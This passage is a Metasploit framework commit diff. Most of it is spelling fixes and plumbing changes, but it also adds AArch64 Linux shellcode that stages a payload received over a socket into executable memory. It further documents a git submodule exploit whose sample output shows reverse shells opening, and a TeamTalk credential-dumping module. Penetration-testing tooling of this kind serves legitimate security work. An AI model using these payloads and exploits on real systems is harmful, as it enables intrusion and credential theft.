land #8913, fix false positives of telnet scanner vs http servers

Fixes spelling and grammar in a bunch of modules. More to come!

Dockerfile

@@ -42,10 +42,6 @@ RUN apk update && \
     && apk del .ruby-builddeps \
     && rm -rf /var/cache/apk/*
 
-# fix for robots gem not readable (known bug)
-# https://github.com/rapid7/metasploit-framework/issues/6068
-RUN chmod o+r /usr/local/bundle/gems/robots-*/lib/robots.rb
-
 RUN adduser -g msfconsole -D $MSF_USER
 
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.16.3)
+    metasploit-framework (4.16.4)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -58,7 +58,6 @@ PATH
       rex-struct2
       rex-text
       rex-zip
-      robots
       ruby_smb
       rubyntlm
       rubyzip
@@ -170,7 +169,7 @@ GEM
     multipart-post (2.0.0)
     nessus_rest (0.1.6)
     net-ssh (4.1.0)
-    network_interface (0.0.1)
+    network_interface (0.0.2)
     nexpose (6.1.1)
     nokogiri (1.8.0)
       mini_portile2 (~> 2.2.0)
@@ -271,7 +270,6 @@ GEM
     rex-zip (0.1.3)
       rex-text
     rkelly-remix (0.0.7)
-    robots (0.10.1)
     rspec (3.6.0)
       rspec-core (~> 3.6.0)
       rspec-expectations (~> 3.6.0)

documentation/modules/auxiliary/gather/teamtalk_creds.md

@@ -0,0 +1,53 @@
+## Description
+
+  This module retrieves user credentials from BearWare TeamTalk.
+
+  Valid administrator credentials are required.
+
+  Starting from version 5, TeamTalk allows users to login using a username and password combination. The username and password are stored on the server in clear text and can be retrieved remotely by any user with administrator privileges.
+
+
+## Vulnerable Application
+
+  [TeamTalk 5](http://www.bearware.dk/) is a freeware conferencing system which allows multiple users to participate in audio and video conversations. The TeamTalk install file includes both client and server application. A special client application is included with accessibility features for visually impaired.
+
+  This module has been tested successfully on TeamTalk versions 5.2.2.4885 and 5.2.3.4893.
+
+  The TeamTalk software is available on the [BearWare website](http://www.bearware.dk/) and on [GitHub](https://github.com/BearWare/TeamTalk5).
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use auxiliary/gather/teamtalk_creds`
+  3. Do: `set rhost <RHOST>`
+  4. Do: `set rport <RPORT>` (default: `10333`)
+  5. Do: `set username <USERNAME>` (default: `admin`)
+  6. Do: `set password <PASSWORD>` (default: `admin`)
+  7. Do: `run`
+  8. You should get credentials
+
+
+## Scenarios
+
+  ```
+  [*] 172.16.191.166:10333 - Found TeamTalk (protocol version 5.2)
+  [+] 172.16.191.166:10333 - Authenticated successfully
+  [+] 172.16.191.166:10333 - User is an administrator
+  [*] 172.16.191.166:10333 - Found 5 users
+
+  TeamTalk User Credentials
+  =========================
+
+   Username  Password                     Type
+   --------  --------                     ----
+   debbie    1234567890                   1
+   murphy    934txs                       2
+   quinn     ~!@#$%^&*()_+{}|:" <>?;',./  2
+   sparks    password                     2
+   stormy                                 1
+
+  [+] 172.16.191.166:10333 - Credentials saved in: /root/.msf4/loot/20170724092809_default_172.16.191.166_teamtalk.user.cr_034806.txt
+  [*] Auxiliary module execution completed
+  ```
+

documentation/modules/exploit/multi/http/git_submodule_command_exec.md

@@ -0,0 +1,62 @@
+## Vulnerable Application
+
+  Git can be installed on a variety of operating systems, however
+  newer versions may contain the patch for this vulnerability.
+
+  On OSX it can be installed with the XCode command line tools:
+  ```xcode-select --install```
+  
+  On Linux it can be installed with apt:
+  ```sudo apt-get update && sudo apt-get install git```
+
+  You can check the version with ```git --version```.
+  The fix is included in the following version:
+    2.7.6, 2.8.6, 2.9.5, 2.10.4, 2.11.3, 2.12.4, 2.13.5, 2.14.1
+
+## Verification Steps
+
+  Example steps in this format:
+
+  1. Install the application
+  1. Start msfconsole
+  1. Do: ```use exploit/multi/http/git_submodule_command_exec```
+  1. Do: ```set SRVHOST [local host]```
+  1. Do: ```set LHOST [local host]```
+  1. Do: ```exploit```
+  1. Clone the malicious Git URI and its submodules
+  1. You should get a shell
+
+## Options
+
+  **GIT_URI**
+
+  This is the URI the git repository will be hosted from (defaults to random).
+
+  **GIT_SUBMODULE**
+
+  This is the URI of the submodule within the git repository (defaults to random).
+  The url of this submodule, when cloned, will execute the payload.
+
+## Scenarios
+
+  Example usage against a macOS Sierra x64 bit target running git version 2.10.1
+
+```
+msf > use exploit/multi/http/git_submodule_command_exec
+msf exploit(git_submodule_command_exec) > set SRVHOST 192.168.0.1
+SRVHOST => 192.168.0.1
+msf exploit(git_submodule_command_exec) > set LHOST 192.168.0.1
+LHOST => 192.168.0.1
+msf exploit(git_submodule_command_exec) > exploit
+[*] Exploit running as background job.
+
+[*] Started reverse TCP handler on 192.168.0.1:4444
+msf exploit(git_submodule_command_exec) > [*] Using URL: http://192.168.0.1:8080/D29MF1UC
+[*] Server started.
+[*] Malicious Git URI is http://192.168.0.1:8080/ldnwrixuqq.git
+***
+Victim executes: git clone http://192.168.0.1:8080/ldnwrixuqq.git --recurse-submodules
+***
+[*] Command shell session 1 opened (192.168.0.1:4444 -> 192.168.0.1:55151) at 2017-08-29 16:54:56 +0800
+[*] Command shell session 2 opened (192.168.0.1:4444 -> 192.168.0.1:55152) at 2017-08-29 16:54:56 +0800
+```

external/source/shellcode/linux/aarch64/stage_mettle.s

@@ -0,0 +1,98 @@
+.equ SYS_READ, 0x3f
+.equ SYS_MMAP, 0xde
+.equ SYS_EXIT, 0x5d
+
+start:
+    adr    x2, size
+    ldr    w2, [x2]
+    mov    x10, x2
+
+    /* Page-align, assume <4GB */
+    lsr    x2, x2, #12
+    add    x2, x2, #1
+    lsl    x2, x2, #12
+
+    /* mmap(addr=0, length='x2', prot=7, flags=34, fd=0, offset=0) */
+    mov    x0, xzr
+    mov    x1, x2
+    mov    x2, #7
+    mov    x3, #34
+    mov    x4, xzr
+    mov    x5, xzr
+    mov    x8, SYS_MMAP
+    svc    0
+
+    /* Grab the saved size, save the address */
+    mov    x4, x10
+
+    /* Save the memory address */
+    mov    x3, x0
+    mov    x10, x0
+
+read_loop:
+    /* read(sockfd, buf='x3', nbytes='x4') */
+    mov    x0, x12
+    mov    x1, x3
+    mov    x2, x4
+    mov    x8, SYS_READ
+    svc    0
+    cbz    w0, failed
+    add    x3, x3, x0
+    subs   x4, x4, x0
+    bne    read_loop
+
+    /* add entry_offset */
+    adr    x0, entry
+    ldr    x0, [x0]
+    add    x0, x0, x10
+    mov    x14, x0
+
+    /* set up the initial stack */
+    mov    x0, sp
+    and    sp, x0, #-16
+    add    sp, sp, #(16 * 6)
+
+    /* argc = 2, argv[0] = 'm' */
+    mov    x0, #2
+    mov    x1, #109
+    str    x1, [sp]
+    mov    x1, sp
+
+    mov    x2, x12
+    mov    x3, 0
+
+    mov    x4, 0
+    mov    x5, #7 /* AT_BASE */
+
+    mov    x6, x10
+    mov    x7, #6 /* AT_PAGESZ */
+
+    mov    x8, #0x1000
+    mov    x9, #25 /* AT_RANDOM */
+
+    mov    x10, x10
+    mov    x11, #0 /* AT_NULL */
+
+    stp    x10, x11, [sp, #-16]!
+    stp    x8, x9, [sp, #-16]!
+    stp    x6, x7, [sp, #-16]!
+    stp    x4, x5, [sp, #-16]!
+    stp    x2, x3, [sp, #-16]!
+    stp    x0, x1, [sp, #-16]!
+
+    mov    x29, #0
+    mov    x30, #0
+    br     x14
+
+failed:
+    mov    x0, 0
+    mov    x8, SYS_EXIT
+    svc    0
+
+.balign 16
+size:
+        .word 0
+        .word 0
+entry:
+        .word 0
+        .word 0

external/source/shellcode/linux/aarch64/stager_sock_reverse.s

@@ -37,9 +37,10 @@ start:
     mov    x2, #4
     mov    x8, SYS_READ
     svc    0
-    cbz    w0, failed
+    cmn    x0, #0x1
+    beq    failed
 
-    ldr    x2, [sp,#0]
+    ldr    w2, [sp,#0]
 
     /* Page-align, assume <4GB */
     lsr    x2, x2, #12
@@ -53,12 +54,13 @@ start:
     mov    x3, #34
     mov    x4, xzr
     mov    x5, xzr
-    /* call mmap() */
-    movi   x8, SYS_MMAP
+    mov    x8, SYS_MMAP
     svc    0
+    cmn    x0, #0x1
+    beq    failed
 
     /* Grab the saved size, save the address */
-    ldr    x4, [sp]
+    ldr    w4, [sp]
 
     /* Save the memory address */
     str    x0, [sp]
@@ -73,13 +75,15 @@ read_loop:
     mov    x2, x4
     mov    x8, SYS_READ
     svc    0
+    cmn    x0, #0x1
+    beq    failed
     add    x3, x3, x0
     subs   x4, x4, x0
     bne    read_loop
 
     /* Go to shellcode */
-    ldr    x30, [sp]
-    ret
+    ldr    x0, [sp]
+    blr    x0
 
 failed:
     mov    x0, 0

lib/metasploit/framework/version.rb

@@ -30,7 +30,7 @@ module Metasploit
         end
       end
 
-      VERSION = "4.16.3"
+      VERSION = "4.16.4"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

lib/msf/core/auxiliary/login.rb

@@ -44,6 +44,7 @@ module Auxiliary::Login
         Unable    | Error    | Denied    | Reject   |
         Refuse    | Close    | Closing   | %\ Bad   |
         Sorry     |
+        ^http | html |
         Not\ on\ system\ console |
         Enter\ username\ and\ password |
         Auto\ Apply\ On |

lib/msf/ui/console/command_dispatcher/auxiliary.rb

@@ -96,7 +96,7 @@ class Auxiliary
     }
 
     # Always run passive modules in the background
-    if (mod.passive or mod.passive_action?(action))
+    if (mod.passive || mod.passive_action?(action || mod.default_action))
       jobify = true
     end
 
@@ -131,8 +131,8 @@ class Auxiliary
       return false
     end
 
-    if (jobify)
-      print_status("Auxiliary module running as background job")
+    if (jobify && mod.job_id)
+      print_status("Auxiliary module running as background job #{mod.job_id}.")
     else
       print_status("Auxiliary module execution completed")
     end

lib/msf/ui/console/command_dispatcher/exploit.rb

@@ -145,10 +145,8 @@ class Exploit
       end
     # If we ran the exploit as a job, indicate such so the user doesn't
     # wonder what's up.
-    elsif (jobify)
-      if mod.job_id
-        print_status("Exploit running as background job #{mod.job_id}.")
-      end
+    elsif (jobify && mod.job_id)
+      print_status("Exploit running as background job #{mod.job_id}.")
     # Worst case, the exploit ran but we got no session, bummer.
     else
       # If we didn't run a payload handler for this exploit it doesn't

lib/msf/ui/console/command_dispatcher/jobs.rb

@@ -339,7 +339,7 @@ module Msf
               framework.jobs[job_id.to_s].send(:name=, job_name)
             end
 
-            print_status "Payload Handler Started as Job #{job_id}"
+            print_status "Payload handler running as background job #{job_id}."
           end
         end
       end

lib/msf/ui/console/command_dispatcher/post.rb

@@ -131,8 +131,8 @@ class Post
       return false
     end
 
-    if (jobify)
-      print_status("Post module running as background job")
+    if (jobify && mod.job_id)
+      print_status("Post module running as background job #{mod.job_id}.")
     else
       print_status("Post module execution completed")
     end

lib/msf/util/exe.rb

@@ -165,6 +165,14 @@ require 'msf/core/exe/segment_appender'
       # XXX: Add remaining ARMLE systems here
     end
 
+    if arch.index(ARCH_AARCH64)
+      if plat.index(Msf::Module::Platform::Linux)
+        return to_linux_aarch64_elf(framework, code)
+      end
+
+      # XXX: Add remaining AARCH64 systems here
+    end
+
     if arch.index(ARCH_PPC)
       if plat.index(Msf::Module::Platform::OSX)
         return to_osx_ppc_macho(framework, code)

lib/robots.rb

@@ -0,0 +1,162 @@
+#
+#  Copyright (c) 2008 Kyle Maxwell, contributors
+#
+#  Permission is hereby granted, free of charge, to any person
+#  obtaining a copy of this software and associated documentation
+#  files (the "Software"), to deal in the Software without
+#  restriction, including without limitation the rights to use,
+#  copy, modify, merge, publish, distribute, sublicense, and/or sell
+#  copies of the Software, and to permit persons to whom the
+#  Software is furnished to do so, subject to the following
+#  conditions:
+#
+#  The above copyright notice and this permission notice shall be
+#  included in all copies or substantial portions of the Software.
+#
+#  THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+#  EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
+#  OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+#  NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
+#  HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
+#  WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+#  FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
+#  OTHER DEALINGS IN THE SOFTWARE.
+#
+
+require "open-uri"
+require "uri"
+require "timeout"
+require 'rex/logging/log_dispatcher'
+
+# https://github.com/fizx/robots
+class Robots
+  DEFAULT_TIMEOUT = 3
+
+  # Represents a parsed robots.txt file
+  class ParsedRobots
+    def initialize(uri, user_agent)
+      @last_accessed = Time.at(1)
+
+      io = Robots.get_robots_txt(uri, user_agent)
+
+      if !io || io.content_type != "text/plain" || io.status.first != "200"
+        io = StringIO.new("User-agent: *\nAllow: /\n")
+      end
+
+      @other = {}
+      @disallows = {}
+      @allows = {}
+      @delays = {} # added delays to make it work
+      agent = /.*/
+      io.each do |line|
+        next if line =~ /^\s*(#.*|$)/
+        arr = line.split(":")
+        key = arr.shift.to_s.downcase
+        value = arr.join(":").strip
+        value.strip!
+        case key
+        when "user-agent"
+          agent = to_regex(value)
+        when "allow"
+          @allows[agent] ||= []
+          @allows[agent] << to_regex(value)
+        when "disallow"
+          @disallows[agent] ||= []
+          @disallows[agent] << to_regex(value)
+        when "crawl-delay"
+          @delays[agent] = value.to_i
+        else
+          @other[key] ||= []
+          @other[key] << value
+        end
+      end
+
+      @parsed = true
+    end
+
+    def allowed?(uri, user_agent)
+      return true unless @parsed
+      allowed = true
+      path = uri.request_uri
+
+      @disallows.each do |key, value|
+        if user_agent =~ key
+          value.each do |rule|
+            allowed = false if path =~ rule
+          end
+        end
+      end
+
+      @allows.each do |key, value|
+        unless allowed
+          if user_agent =~ key
+            value.each do |rule|
+              if path =~ rule
+                allowed = true
+              end
+            end
+          end
+        end
+      end
+
+      if allowed && @delays[user_agent]
+        sleep @delays[user_agent] - (Time.now - @last_accessed)
+        @last_accessed = Time.now
+      end
+
+      return allowed
+    end
+
+    def other_values
+      @other
+    end
+
+    protected
+
+    def to_regex(pattern)
+      return /should-not-match-anything-123456789/ if pattern.strip.empty?
+      pattern = Regexp.escape(pattern)
+      pattern.gsub!(Regexp.escape("*"), ".*")
+      Regexp.compile("^#{pattern}")
+    end
+  end
+
+  def self.get_robots_txt(uri, user_agent)
+    begin
+      Timeout.timeout(Robots.timeout) do
+        begin
+          URI.join(uri.to_s, "/robots.txt").open("User-Agent" => user_agent)
+        rescue StandardError
+          nil
+        end
+      end
+    rescue Timeout::Error
+      dlog("robots.txt request timed out")
+    end
+  end
+
+  attr_writer :timeout
+
+  def self.timeout
+    @timeout || DEFAULT_TIMEOUT
+  end
+
+  def initialize(user_agent)
+    @user_agent = user_agent
+    @parsed = {}
+  end
+
+  def allowed?(uri)
+    uri = URI.parse(uri.to_s) unless uri.is_a?(URI)
+    host = uri.host
+    @parsed[host] ||= ParsedRobots.new(uri, @user_agent)
+    @parsed[host].allowed?(uri, @user_agent)
+  end
+
+  def other_values(uri)
+    uri = URI.parse(uri.to_s) unless uri.is_a?(URI)
+    host = uri.host
+    @parsed[host] ||= ParsedRobots.new(uri, @user_agent)
+    @parsed[host].other_values
+  end
+end

metasploit-framework.gemspec

@@ -171,8 +171,6 @@ Gem::Specification.new do |spec|
   spec.add_runtime_dependency 'rex-exploitation'
   # Command line editing, history, and tab completion in msfconsole
   spec.add_runtime_dependency 'rb-readline'
-  # Needed by anemone crawler
-  spec.add_runtime_dependency 'robots'
   # Needed by some modules
   spec.add_runtime_dependency 'rubyzip'
   # Needed for some post modules

modules/auxiliary/admin/backupexec/registry.rb

@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
       'Description'    => %q{
         This modules exploits a remote registry access flaw in the BackupExec Windows
       Server RPC service. This vulnerability was discovered by Pedram Amini and is based
-      on the NDR stub information information posted to openrce.org.
+      on the NDR stub information posted to openrce.org.
       Please see the action list for the different attack modes.
 
       },

modules/auxiliary/admin/http/intersil_pass_reset.rb

@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'          => 'Intersil (Boa) HTTPd Basic Authentication Password Reset',
       'Description'   => %q{
-          The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11
+          The Intersil extension in the Boa HTTP Server 0.93.x - 0.94.11
           allows basic authentication bypass when the user string is greater
           than 127 bytes long.  The long string causes the password to be
           overwritten in memory, which enables the attacker to reset the

modules/auxiliary/admin/http/netgear_auth_download.rb

@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
       'Description' => %q{
         Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
         The application has a file download vulnerability that can be exploited by an
-        authenticated remote attacker to download any file in the system..
+        authenticated remote attacker to download any file in the system.
         This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13.
       },
       'Author' =>

modules/auxiliary/admin/http/openbravo_xxe.rb

@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary
         local files. This allows the user to read any files from the FS as the
         user Openbravo is running as (generally not root).
 
-        This module was tested againt Openbravo ERP version 3.0MP25 and 2.50MP6.
+        This module was tested against Openbravo ERP version 3.0MP25 and 2.50MP6.
       },
       'Author' =>
         [

modules/auxiliary/admin/http/tomcat_utf8_traversal.rb

@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary
     super(
       'Name'           => 'Tomcat UTF-8 Directory Traversal Vulnerability',
       'Description'    => %q{
-        This module tests whether a directory traversal vulnerablity is present
+        This module tests whether a directory traversal vulnerability is present
         in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0
         - 6.0.16 under specific and non-default installations. The connector must have
         allowLinking set to true and URIEncoding set to UTF-8. Furthermore, the

modules/auxiliary/admin/http/webnms_cred_disclosure.rb

@@ -14,9 +14,9 @@ class MetasploitModule < Msf::Auxiliary
         'Name' => 'WebNMS Framework Server Credential Disclosure',
         'Description' => %q(
 This module abuses two vulnerabilities in WebNMS Framework Server 5.2 to extract
-all user credentials. The first vulnerability is a unauthenticated file download
+all user credentials. The first vulnerability is an unauthenticated file download
 in the FetchFile servlet, which is used to download the file containing the user
-credentials. The second vulnerability is that the the passwords in the file are
+credentials. The second vulnerability is that the passwords in the file are
 obfuscated with a very weak algorithm which can be easily reversed.
 This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on
 Windows and Linux.

modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb

@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'            => 'WordPress WP EasyCart Plugin Privilege Escalation',
       'Description'     => %q{
         The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20 allows authenticated
-        users  of any user level to set any system option via a lack of validation in the
+        users of any user level to set any system option via a lack of validation in the
         ec_ajax_update_option and ec_ajax_clear_all_taxrates functions located in
         /inc/admin/admin_ajax_functions.php. The module first changes the admin e-mail address
         to prevent any notifications being sent to the actual administrator during the attack,

modules/auxiliary/admin/mssql/mssql_sql.rb

@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'           => 'Microsoft SQL Server Generic Query',
       'Description'    => %q{
           This module will allow for simple SQL statements to be executed against a
-          MSSQL/MSDE instance given the appropiate credentials.
+          MSSQL/MSDE instance given the appropriate credentials.
       },
       'Author'         => [ 'tebo <tebo[at]attackresearch.com>' ],
       'License'        => MSF_LICENSE,

modules/auxiliary/admin/mssql/mssql_sql_file.rb

@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary
       'Description'    => %q{
         This module will allow for multiple SQL queries contained within a specified
         file to be executed against a Microsoft SQL (MSSQL) Server instance, given
-        the appropiate credentials.
+        the appropriate credentials.
       },
       'Author'         => [ 'j0hn__f : <jf[at]tinternet.org.uk>' ],
       'License'        => MSF_LICENSE

modules/auxiliary/admin/oracle/oracle_sql.rb

@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'           => 'Oracle SQL Generic Query',
       'Description'    => %q{
           This module allows for simple SQL statements to be executed
-          against a Oracle instance given the appropriate credentials
+          against an Oracle instance given the appropriate credentials
           and sid.
       },
       'Author'         => [ 'MC' ],

modules/auxiliary/admin/oracle/osb_execqr.rb

@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Oracle Secure Backup exec_qr() Command Injection Vulnerability',
       'Description'    => %q{
-          This module exploits a command injection vulnerablility in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2.
+          This module exploits a command injection vulnerability in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2.
       },
       'Author'         => [ 'MC' ],
       'License'        => MSF_LICENSE,

modules/auxiliary/admin/postgres/postgres_sql.rb

@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'           => 'PostgreSQL Server Generic Query',
       'Description'    => %q{
           This module will allow for simple SQL statements to be executed against a
-          PostgreSQL instance given the appropiate credentials.
+          PostgreSQL instance given the appropriate credentials.
       },
       'Author'         => [ 'todb' ],
       'License'        => MSF_LICENSE,

modules/auxiliary/admin/scada/multi_cip_command.rb

@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands',
       'Description'    => %q{
-        The EtnerNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which
+        The EtherNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which
         implements the protocol.  This module implements the CPU STOP command, as well as
         the ability to crash the Ethernet card in an affected device.
 

modules/auxiliary/admin/tikiwiki/tikidblib.rb

@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'           => 'TikiWiki Information Disclosure',
       'Description'    => %q{
           A vulnerability has been reported in Tikiwiki, which can be exploited by
-        a anonymous user to dump the MySQL user & passwd just by creating a mysql
+        an anonymous user to dump the MySQL user & passwd just by creating a mysql
         error with the "sort_mode" var.
 
         The vulnerability was reported in Tikiwiki version 1.9.5.

modules/auxiliary/admin/webmin/edit_html_fileaccess.rb

@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary
           This module exploits a directory traversal in Webmin 1.580. The vulnerability
         exists in the edit_html.cgi component and allows an authenticated user with access
         to the File Manager Module to access arbitrary files with root privileges. The
-        module has been tested successfully with Webim 1.580 over Ubuntu 10.04.
+        module has been tested successfully with Webmin 1.580 over Ubuntu 10.04.
       },
       'Author'         => [
         'Unknown', # From American Information Security Group

modules/auxiliary/bnat/bnat_scan.rb

@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'         => 'BNAT Scanner',
       'Description'  => %q{
           This module is a scanner which can detect Broken NAT (network address translation)
-        implementations, which could result in a inability to reach ports on remote
+        implementations, which could result in an inability to reach ports on remote
         machines. Typically, these ports will appear in nmap scans as 'filtered'/'closed'.
         },
       'Author'       =>

modules/auxiliary/client/hwbridge/connect.rb

@@ -18,10 +18,10 @@ class MetasploitModule < Msf::Auxiliary
           Metasploit to interact with Hardware Devices.  This extends
           the normal exploit capabilities to the non-ethernet realm and
           enables direct hardware and alternative bus manipulations.  You
-          mush have compatible bridging hardware attached to this machine or
+          must have compatible bridging hardware attached to this machine or
           reachable on your network to use any HWBridge exploits.
 
-          Use this exploit module to connect the the physical HWBridge which
+          Use this exploit module to connect the physical HWBridge which
           will start an interactive hwbridge session.  You can launch a hwbridge
           server locally by using compliant hardware and executing the local_hwbridge
           module.  After that module has started, pass the HWBRIDGE_BASE_URL

modules/auxiliary/crawler/msfcrawler.rb

@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary
   def initialize(info = {})
     super(update_info(info,
       'Name'			=> 'Metasploit Web Crawler',
-      'Description'       => 'This auxiliary module is a modular web crawler, to be used in conjuntion with wmap (someday) or standalone.',
+      'Description'       => 'This auxiliary module is a modular web crawler, to be used in conjunction with wmap (someday) or standalone.',
       'Author'			=> 'et',
       'License'			=> MSF_LICENSE
     ))

modules/auxiliary/dos/misc/dopewars.rb

@@ -11,8 +11,8 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'			 => 'Dopewars Denial of Service',
       'Description'	 => %q{
-          The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to
-        a  lack of input validation.
+          The jet command in Dopewars 1.5.12 is vulnerable to a segmentation fault due to
+        a lack of input validation.
       },
       'Author'		 => [ 'Doug Prostko <dougtko[at]gmail.com>' ],
       'License'		 => MSF_LICENSE,

modules/auxiliary/dos/ssl/dtls_changecipherspec.rb

@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'		=> 'OpenSSL DTLS ChangeCipherSpec Remote DoS',
       'Description'	=> %q{
           This module performs a Denial of Service Attack against Datagram TLS in OpenSSL
-        version 0.9.8i and earlier. OpenSSL crashes under these versions when it recieves a
+        version 0.9.8i and earlier. OpenSSL crashes under these versions when it receives a
         ChangeCipherspec Datagram before a ClientHello.
       },
       'Author'	=> [

modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb

@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
         FTP request containing Telnet IAC (0xff) bytes. When constructing the response,
         the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes.
 
-        This issue can be triggered pre-auth and may in fact be explotiable for
+        This issue can be triggered pre-auth and may in fact be exploitable for
         remote code execution.
       },
       'Author'         =>

modules/auxiliary/dos/windows/games/kaillera.rb

@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'           => 'Kaillera 0.86 Server Denial of Service' ,
       'Description'    => %q{
           The Kaillera 0.86 server can be shut down by sending any malformed packet
-        after the intial "hello" packet.
+        after the initial "hello" packet.
       },
       'Author'         => ["Sil3nt_Dre4m"],
       'License'        => MSF_LICENSE,

modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb

@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
       'Description'    => %q{
           This module exploits a denial of service flaw in the Microsoft
         Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger
-        this bug, run this module as a service and forces a vulnerabile client
+        this bug, run this module as a service and forces a vulnerable client
         to access the IP of this system as an SMB server. This can be accomplished
         by embedding a UNC path (\\HOST\share\something) into a web page if the
         target is using Internet Explorer, or a Word document otherwise.

modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb

@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'SMB Negotiate SMB2 Dialect Corruption',
       'Description'    => %q{
-        This module sends a series of SMB negiotiate requests that advertise a
+        This module sends a series of SMB negotiate requests that advertise a
       SMB2 dialect with corrupted bytes.
       },
       'Author'         => [ 'hdm' ],

modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb

@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'SMB Negotiate Dialect Corruption',
       'Description'    => %q{
-        This module sends a series of SMB negiotiate requests with corrupted bytes
+        This module sends a series of SMB negotiate requests with corrupted bytes
       },
       'Author'         => [ 'hdm' ],
       'License'        => MSF_LICENSE

modules/auxiliary/gather/android_stock_browser_uxss.rb

@@ -20,8 +20,8 @@ class MetasploitModule < Msf::Auxiliary
         which will cause a popup window to be used. This requires a click from the user
         and is much less stealthy, but is generally harmless-looking.
 
-        By supplying a CUSTOM_JS paramter and ensuring CLOSE_POPUP is set to false, this
-        module also allows running aribrary javascript in the context of the targeted URL.
+        By supplying a CUSTOM_JS parameter and ensuring CLOSE_POPUP is set to false, this
+        module also allows running aribtrary javascript in the context of the targeted URL.
         Some sample UXSS scripts are provided in data/exploits/uxss.
       },
       'Author'         => [

modules/auxiliary/gather/corpwatch_lookup_name.rb

@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
       'Description'    => %q{
           This module interfaces with the CorpWatch API to get publicly available
         info for a given company name.  Please note that by using CorpWatch API, you
-        acknolwdge the limitations of the data CorpWatch provides, and should always
+        acknowledge the limitations of the data CorpWatch provides, and should always
         verify the information with the official SEC filings before taking any action.
       },
       'Author'         => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],

modules/auxiliary/gather/eaton_nsm_creds.rb

@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary
         This module will extract user credentials from Network Shutdown Module
         versions 3.21 and earlier by exploiting a vulnerability found in
         lib/dbtools.inc, which uses unsanitized user input inside a eval() call.
-        Please note that in order to extract credentials,the vulnerable service
+        Please note that in order to extract credentials, the vulnerable service
         must have at least one USV module (an entry in the "nodes" table in
         mgedb.db).
       },

modules/auxiliary/gather/impersonate_ssl.rb

@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Auxiliary
         (self.signed) version using the information from the remote version. The module
         then Outputs (PEM|DER) format private key / certificate and a combined version
         for use in Apache or other Metasploit modules requiring SSLCert Inputs for private
-        key / CA cert have been provided for those with diginator certs hanging about!
+        key / CA cert have been provided for those with DigiNotar certs hanging about!
       }
     ))
 

modules/auxiliary/gather/kerberos_enumusers.rb

@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name' => 'Kerberos Domain User Enumeration',
       'Description' => %q(
-        This module will enumerate valid Domain Users via Kerberos from an unauthenticated perspective. It utilises
+        This module will enumerate valid Domain Users via Kerberos from an unauthenticated perspective. It utilizes
         the different responses returned by the service for valid and invalid users.
       ),
       'Author' =>

modules/auxiliary/gather/shodan_search.rb

